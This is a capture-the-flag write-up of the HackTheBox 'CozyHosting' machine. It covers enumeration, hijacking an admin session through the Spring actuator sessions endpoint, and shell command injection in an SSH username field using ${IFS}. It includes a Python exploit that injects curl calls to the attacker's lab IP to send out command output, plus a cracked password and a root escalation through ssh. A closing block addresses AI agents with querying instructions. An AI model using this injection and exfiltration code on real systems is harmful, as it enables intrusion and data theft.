# CozyHosting ## Enumeration ### Nmap ``` sudo nmap -p22,80 -A -oA nmap 10.10.11.230 Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-12 13:43 EDT Nmap scan report for 10.10.11.230 Host is up (0.037s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 43:56:bc:a7:f2:ec:46:dd:c1:0f:83:30:4c:2c:aa:a8 (ECDSA) |_ 256 6f:7a:6c:3f:a6:8d:e2:75:95:d4:7b:71:ac:4f:7e:42 (ED25519) 80/tcp open http nginx 1.18.0 (Ubuntu) |_http-title: Did not follow redirect to http://cozyhosting.htb |_http-server-header: nginx/1.18.0 (Ubuntu) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Linux 2.6.32 (96%), Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (95%), Linux 5.0 - 5.5 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.0 (93%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 443/tcp) HOP RTT ADDRESS 1 36.24 ms 10.10.14.1 2 36.62 ms 10.10.11.230 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 12.26 seconds ``` ### Wapalyzer Wapalyzer detect it is `Java` application it could be SpringBoot framework as it is most popular one in Java ![](https://133742081-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDnToeJfxVb7jBS1Pupch%2Fuploads%2Fc1UBxVVSYrtRcRrlQltb%2FPasted%20image%2020230912195335.png?alt=media\&token=e94edd67-6810-4e00-9427-4474df11989a) ### FFUF Directory bruteforcing ``` ffuf -u http://cozyhosting.htb/FUZZ -w /opt/SecLists/Discovery/Web-Content/spring-boot.txt -recursion -recursion-depth 3 /'___\ /'___\ /'___\ /\ \__/ /\ \__/ __ __ /\ \__/ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ \ \_\ \ \_\ \ \____/ \ \_\ \/_/ \/_/ \/___/ \/_/ v2.0.0-dev ________________________________________________ :: Method : GET :: URL : http://cozyhosting.htb/FUZZ :: Wordlist : FUZZ: /opt/SecLists/Discovery/Web-Content/spring-boot.txt :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 40 :: Matcher : Response status: 200,204,301,302,307,401,403,405,500 ________________________________________________ [Status: 200, Size: 634, Words: 1, Lines: 1, Duration: 54ms] * FUZZ: actuator [Status: 200, Size: 487, Words: 13, Lines: 1, Duration: 96ms] * FUZZ: actuator/env/home [Status: 200, Size: 487, Words: 13, Lines: 1, Duration: 61ms] * FUZZ: actuator/env/path [Status: 200, Size: 487, Words: 13, Lines: 1, Duration: 66ms] * FUZZ: actuator/env/lang [Status: 200, Size: 4957, Words: 120, Lines: 1, Duration: 117ms] * FUZZ: actuator/env [Status: 200, Size: 9938, Words: 108, Lines: 1, Duration: 65ms] * FUZZ: actuator/mappings [Status: 200, Size: 398, Words: 1, Lines: 1, Duration: 48ms] * FUZZ: actuator/sessions [Status: 200, Size: 15, Words: 1, Lines: 1, Duration: 77ms] * FUZZ: actuator/health [Status: 200, Size: 127224, Words: 542, Lines: 1, Duration: 65ms] * FUZZ: actuator/beans :: Progress: [112/112] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 :: ``` This found some intereting endpoints. `Actuator` endpoints are debuging information for example `sessions` endpoints allows retrieval and deletion of user sessions from a Spring Session-backed session store. Requires a servlet-based web application that uses Spring Session. Docs: {% embed url="" %}

## Auth bypass Stolen session allows accessing `/admin` endpoint Request:

GET /admin HTTP/1.1
Host: cozyhosting.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Cookie: JSESSIONID=A51BB440D8F95FB64E56DE075783F95C
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

## Exploitation Admin dashboard allows `SSH` connection to previously configured hosts.

By adding `;` username it throws error implying that is executed by bash directly.

Some output can be extracted by using `$(command)` syntax.

When trying to execute more complex command application throws error that `Username can't contain whitespaces`

But this can be bypassed by using `${IFS}` shell variable as this stand for separator so command `$(ls${IFS}/)` results in valid command. ### Exploit ```python import concurrent.futures from threading import Thread import requests import cmd from http.server import BaseHTTPRequestHandler, HTTPServer, ThreadingHTTPServer import socketserver import base64 IP='0.0.0.0' PORT=8000 URL='http://cozyhosting.htb/executessh' PROXY = { 'http':'http://127.0.0.1:8080' } COOKIES={'JSESSIONID':'B4CB94691CEF79C8F83C1C5505C0B230'} def hatfuServer(): webServer = HTTPServer((IP, PORT), CatchServer) #webServer.serve_forever() def handle_request(webServer): with webServer: webServer.serve_forever() thread = Thread(target=handle_request, args=(webServer,)) thread.daemon=True thread.start() return webServer class CatchServer(BaseHTTPRequestHandler): def log_request(self, code): pass def do_GET(self): self.send_response(200, "A Chuj Ci w Dupe") self.send_header('Connection', 'Close') self.end_headers() #data = base64.b64decode(self.path.split('=')[1]) data = self.path.split('=')[1] data = data + '=' * (len(data) % 4) data = base64.b64decode(data).decode().strip() print(data, flush=True) def do_POST(self): self.send_response(200, "A Chuj Ci w Dupe") self.send_header('Connection', 'Close') self.end_headers() data = self.path.split('=')[1] print(data, flush=True) class Exploit(cmd.Cmd): prompt='> ' def default(self, line): payload=line.replace(' ','${IFS}') r = requests.post(URL, data={'host': '127.0.0.1', 'username':';$(curl${IFS}http://10.10.14.156:8000/a?data='+f'$({payload}|base64));'}, proxies=PROXY, cookies=COOKIES) try: webServer = hatfuServer() Exploit().cmdloop() except KeyboardInterrupt: webServer.server_close() print('naura') ``` To make exploitation easier I wrote some exploit in python to automate code execution.

## Privilege Escalation In app directory there is `jar` source file. After unziping it and `grep'ing` files I found password and login.

Database contained password hasehs of two users `kanderson` and `admin`

`Admin` password is crackable. ``` admin:manchesterunited ``` This credential can be reused to login to `josh` account ## Root

Josh user can run `ssh` binary with `root` permission. This can be exploited by gaining `root` shell {% embed url="" %}

[^1]: Default-spring-cookie-name --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://sovietbeast-writeups.gitbook.io/writeups/hackthebox/linux/cozyhosting.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.